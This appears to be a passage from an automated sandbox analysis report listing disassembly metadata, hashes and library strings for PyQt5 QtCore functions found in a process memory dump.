                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Err_$Data@@List$?dispose@ClearData@1@@$Iter_Nextmemcpy$?detach_grow@Data@1@FlagsFormatIterObject_OccurredType_
                                                                                                                                                                                                                • String ID: index %zd has type '%s' but 'QAbstractState' is expected
                                                                                                                                                                                                                • API String ID: 1419802644-3746736797
                                                                                                                                                                                                                • Opcode ID: 9410de18bc1c2157c7ab7c2994aacfdf4e6d9ab5b5bb43fb83c5998026bd423e
                                                                                                                                                                                                                • Instruction ID: c9ce4585a8fe74b71f9d10726751865d51ca9b47e77d948824410e939376cb86
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9410de18bc1c2157c7ab7c2994aacfdf4e6d9ab5b5bb43fb83c5998026bd423e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BA1A9B2A0AA4686EA509F25E954BBC77A0FF85F95F484031CE4E13758EF7CD499C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_$Dealloc$Clear$ArrayData@@Iter_NextOccurred$?deallocate@?sharedExceptionFlagsFormatIterMatchesNull@Object_Type_U1@_
                                                                                                                                                                                                                • String ID: index %zd has type '%s' but 'int' is expected
                                                                                                                                                                                                                • API String ID: 2813311218-1902674334
                                                                                                                                                                                                                • Opcode ID: d06203d44fff7c9d9a0e2b3c58c7b944758159d88b289ecd5c6a39a11bb6b5cf
                                                                                                                                                                                                                • Instruction ID: 6c6a70c5ac395a8779e4d8e52df8f839f7ccc591c3bb93063f6a5dcbd8af44c3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d06203d44fff7c9d9a0e2b3c58c7b944758159d88b289ecd5c6a39a11bb6b5cf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B46172B1B0964285EA589F36E948A3CB7A0FF85F95F088032CE4E57754DF7DE4898314
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dict_Next$Array@@ByteErr_FlagsOccurredType_V0@@
                                                                                                                                                                                                                • String ID: a dict key has type '%s' but 'int' is expected$a dict value has type '%s' but 'QByteArray' is expected
                                                                                                                                                                                                                • API String ID: 1417990255-97992485
                                                                                                                                                                                                                • Opcode ID: 6221ab3c2da29ffc266a00f80c5b0e2d323ee84093b116a40332011b49f3575d
                                                                                                                                                                                                                • Instruction ID: 7873ddd0de149ee305cba2cf077ced1cd906a34fae52f621b09b92816b26bf38
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6221ab3c2da29ffc266a00f80c5b0e2d323ee84093b116a40332011b49f3575d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3A1AEB2A09A4686DB80DF26E454ABD37A4FB84FD4F088132DA0E93764DF7CE449C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Array@@Byte$?addAbstractState@@Transition@$?constData@Object@@SignalState@@@Transition@@Transition@@@
                                                                                                                                                                                                                • String ID: BJ:$BP0J8$QState$addTransition$addTransition(self, transition: Optional[QAbstractTransition])addTransition(self, signal: pyqtBoundSignal, target: Optional[QAbstractState]) -> Optional[QSignalTransition]addTransition(self, target: Optional[QAbstractState]) -> Optional[QAbstractTransition]
                                                                                                                                                                                                                • API String ID: 3062659428-469252757
                                                                                                                                                                                                                • Opcode ID: 32a7cc42e217c3b32b609878c0801cd3eed21623f860bfef971e34cb463b87b9
                                                                                                                                                                                                                • Instruction ID: dcacb0519b65e2d4b6a17d0d2484f05886e018a361abee18158c5b729db81e4f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32a7cc42e217c3b32b609878c0801cd3eed21623f860bfef971e34cb463b87b9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5611FB6615E4699EB408F35E8845AD37B4FB48B98B581132EE4E53778EF3CD188C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Eval_Thread$?copy@File@@RestoreSave$Bool_FromLongString@@0@String@@@
                                                                                                                                                                                                                • String ID: BJ1$J1J1$QFile$copy$copy(self, newName: Optional[str]) -> boolcopy(fileName: Optional[str], newName: Optional[str]) -> bool
                                                                                                                                                                                                                • API String ID: 1452224700-25472255
                                                                                                                                                                                                                • Opcode ID: 49b29ffed7cc7a9fcc2f081839b00e1aea2b40df8e97c04951c47cb975f89b77
                                                                                                                                                                                                                • Instruction ID: 3b4802a075c79608f66a03e870300f0307e703a18da0d08171988b9fb1b99bfc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49b29ffed7cc7a9fcc2f081839b00e1aea2b40df8e97c04951c47cb975f89b77
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 204100B6A15A56C9DB409F76E8445ED37B4FB48B88B081036EE4E53B68EF3CD484C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PyList_Size.PYTHON3(?,?,?,?,00007FFB02FD3F2F), ref: 00007FFB030563B1
                                                                                                                                                                                                                • PyList_GetItem.PYTHON3(?,?,?,?,00007FFB02FD3F2F), ref: 00007FFB03056406
                                                                                                                                                                                                                • PyType_GetFlags.PYTHON3(?,?,?,?,00007FFB02FD3F2F), ref: 00007FFB03056413
                                                                                                                                                                                                                • ?toLocal8Bit@QString@@QEHAA?AVQByteArray@@XZ.QT5CORE(?,?,?,?,00007FFB02FD3F2F), ref: 00007FFB03056434
                                                                                                                                                                                                                • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00007FFB02FD3F2F), ref: 00007FFB0305643F
                                                                                                                                                                                                                • ?constData@QByteArray@@QEBAPEBDXZ.QT5CORE(?,?,?,?,00007FFB02FD3F2F), ref: 00007FFB0305644A
                                                                                                                                                                                                                • ?qstrdup@@YAPEADPEBD@Z.QT5CORE(?,?,?,?,00007FFB02FD3F2F), ref: 00007FFB03056453
                                                                                                                                                                                                                • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,00007FFB02FD3F2F), ref: 00007FFB03056461
                                                                                                                                                                                                                • PyType_GetFlags.PYTHON3(?,?,?,?,00007FFB02FD3F2F), ref: 00007FFB0305646D
                                                                                                                                                                                                                • PyBytes_AsString.PYTHON3(?,?,?,?,00007FFB02FD3F2F), ref: 00007FFB0305647C
                                                                                                                                                                                                                • ?qstrdup@@YAPEADPEBD@Z.QT5CORE(?,?,?,?,00007FFB02FD3F2F), ref: 00007FFB03056485
                                                                                                                                                                                                                  • Part of subcall function 00007FFB0305F2F0: ?fromLatin1@QString@@SA?AV1@PEBDH@Z.QT5CORE(?,?,?,00007FFB02F83B6B), ref: 00007FFB0305F32A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Array@@ByteString@@$?qstrdup@@FlagsList_Type_$?const?fromBit@Bytes_Data@ItemLatin1@Local8SizeString
                                                                                                                                                                                                                • String ID: invalid
                                                                                                                                                                                                                • API String ID: 3099299417-4221139584
                                                                                                                                                                                                                • Opcode ID: 8e20f9c43820240cfc32a99158924bf92de99dd741a5b88de3d264630085d237
                                                                                                                                                                                                                • Instruction ID: 4f3bb18bbf7a47bfacb289375a8466ff5feb428db89261c6840fb36cbc845132
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e20f9c43820240cfc32a99158924bf92de99dd741a5b88de3d264630085d237
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA3190B1A0AA4686EA00DF26EC5CB3E6360FB84BA1F494134DA4E67794FE3CE445C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Meta$?checkArgs@Bool_ConnectDeallocFromLongObject@@$Method@@0@
                                                                                                                                                                                                                • String ID: AAAA$J9J9$QMetaObject$checkConnectArgs$checkConnectArgs(signal: Optional[str], method: Optional[str]) -> boolcheckConnectArgs(signal: QMetaMethod, method: QMetaMethod) -> bool
                                                                                                                                                                                                                • API String ID: 188822902-3545082675
                                                                                                                                                                                                                • Opcode ID: c39c08c4d457f04236bf5255b1f5eaca2a1f4314fce80807bc263bfe4c78c2fb
                                                                                                                                                                                                                • Instruction ID: a1bf2a68fd29f56bd8bc4b5b1e60873ebc421520f434c6afb1a2bdf17c503ad3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c39c08c4d457f04236bf5255b1f5eaca2a1f4314fce80807bc263bfe4c78c2fb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6317EB2A09F46C1DB509F25E888AAE73B4FB84B94F484032DA8D53764EF3DD588C754
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Regular$FromUnicode_$?patternExpression@@Expression@@@@Flags@FormatOption@Options@PatternString@@$?pattern@DeallocExp@@String
                                                                                                                                                                                                                • String ID: , PyQt5.QtCore.QRegularExpression.PatternOptions(%i)$PyQt5.QtCore.QRegularExpression(%R
                                                                                                                                                                                                                • API String ID: 580649008-800555463
                                                                                                                                                                                                                • Opcode ID: 7e750b92560fbccff6b0f22169ba5e43be8b01d999ee1511299d63b33fbadc78
                                                                                                                                                                                                                • Instruction ID: 15fac135ebb2325b8d3a766b65f299cb4e922ea872fbe86bfd9d27f1c9aea834
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e750b92560fbccff6b0f22169ba5e43be8b01d999ee1511299d63b33fbadc78
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 822151A2B09A0281EE45DB35F85867A63A0FF89BC0F885031DA0E13769FF7CD489C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?start@QProcess@@QEAAXAEBVQString@@AEBVQStringList@@V?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z.QT5CORE ref: 00007FFB02F423B4
                                                                                                                                                                                                                • ?start@QProcess@@QEAAXAEBVQString@@V?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z.QT5CORE ref: 00007FFB02F424D5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
